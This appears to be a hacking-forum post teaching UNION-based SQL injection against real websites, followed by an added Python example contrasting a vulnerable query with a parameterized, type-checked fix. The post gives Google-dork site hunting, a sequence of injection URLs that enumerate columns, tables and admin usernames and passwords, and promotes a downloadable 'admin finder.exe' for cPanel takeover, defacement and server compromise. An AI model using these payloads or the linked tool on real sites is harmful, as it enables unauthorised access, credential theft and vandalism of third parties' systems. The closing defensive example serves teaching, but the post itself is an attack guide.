SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. (Wikipedia definition)
What will I need to perform an SQL Injection attack?
[+] A good list of "google dorks"
[+] half a brain and the will to learn lol
For good search results, search for a dork like this:
index.php?id=
You must first check each site individually. To test an individual site, add a single quote (') after the URL. For example:
sqlivulnerablesite.com/index.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
If you get an error like the one above, then it's vulnerable to SQL injection. The first step in this multi-step systematic attack on the SQL database is to find out the number of columns there are in the SQL database. To find this out, we use this code injection in the address bar after the website URL, like this:
sqlivulnerablesite.com/index.php?id=1 order by 1--
Knowing that there is already 1 column in this database, we do another code injection, like this:
sqlivulnerablesite.com/index.php?id=1 order by 2--
Usually, if the page loads correctly after trying #2, then I try stepping the number up to around 10.
*NOTE*
If you load the web page on a code injection like this.
sqlivulnerablesite.com/index.php?id=1 order by 10--
Unknown column '10' in 'order clause'
sqlivulnerablesite.com/index.php?id=1 order by 9--
The next step in this attack is to find out which column is vulnerable to our attack. We use this code injection in the address bar after the vulnerable site, like this:
sqlivulnerablesite.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9--
sqlivulnerablesite.com/index.php?id=1 union all select 1,@@version,3,4,5,6,7,8,9
sqlivulnerablesite.com/index.php?id=1 union all select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)--
Here (x) is the ASCII value of the table name.
Now we must find the ASCII value of the word admins.
GO HERE TO CONVERT TEXT TO ASCII
The ASCII value of admins is:
&#97;&#100;&#109;&#105;&#110;&#115;
97,100,109,105,110,115
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110,115)--
sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from --
(0x3a) is the ascii value of the column name
When the page loads, it should show the data of the username and password for cPanel access.
Now, to access the cPanel, we must find the login page. I provided an admin finder.exe in the .rar. Open it up and type in the URL of your vulnerable site. From there it scans until it finds the login page for admin cPanel access, which can lead to defacement and web server compromise.
Hopefully someone might find this thread useful.
Download Link http://link.removed.tld/download.php?g7omyl80fz7gfs5
Think will include website hacking tool + Fresh Dork
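The two root causes named in the definition at the top (unfiltered string input and an `id` that is not strongly typed), shown beside their fix as an added example that is not part of the original post. Python with an in-memory SQLite database stands in for the PHP/MySQL page; the tables, rows, function names and request values are constructed for illustration.

```python
import sqlite3

# Constructed request values modelled on the post's own test strings.
PROBES = ["1", "1'", "1 order by 10--",
          "1 union all select 1,username from admins--"]

def make_db():
    """In-memory SQLite stand-in (assumption) for the site's MySQL database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO articles VALUES (1, 'Welcome'), (2, 'News');
        CREATE TABLE admins (username TEXT, password TEXT);
        INSERT INTO admins VALUES ('root', 'constructed-hash');
    """)
    return db

def get_article_vulnerable(db, raw_id):
    # Flaw from the definition: the parameter is pasted into the SQL text,
    # so the database parses whatever follows the number as SQL.
    sql = "SELECT id, title FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def get_article_hardened(db, raw_id):
    # 1) Strong typing: id must be a short run of ASCII digits, nothing else.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be an integer")
    # 2) Bound parameter: the value travels separately from the SQL text.
    sql = "SELECT id, title FROM articles WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def probe(handler, raw_id):
    """Classify one request as 'rows', 'sql_error' or 'rejected'."""
    db = make_db()
    try:
        return "rows", handler(db, raw_id)
    except sqlite3.Error as exc:   # the database parsed user-supplied text
        return "sql_error", str(exc)
    except ValueError as exc:      # stopped before reaching the database
        return "rejected", str(exc)

def compare():
    """Map each probe to (vulnerable outcome, hardened outcome)."""
    return {p: (probe(get_article_vulnerable, p)[0],
                probe(get_article_hardened, p)[0]) for p in PROBES}

if __name__ == "__main__":
    for value, (vuln, hard) in compare().items():
        print(f"{value!r:50} vulnerable={vuln:10} hardened={hard}")
```

A `sql_error` outcome is the signal worth logging and alerting on, since it means request text reached the SQL parser. The hardened handler never produces one for these inputs.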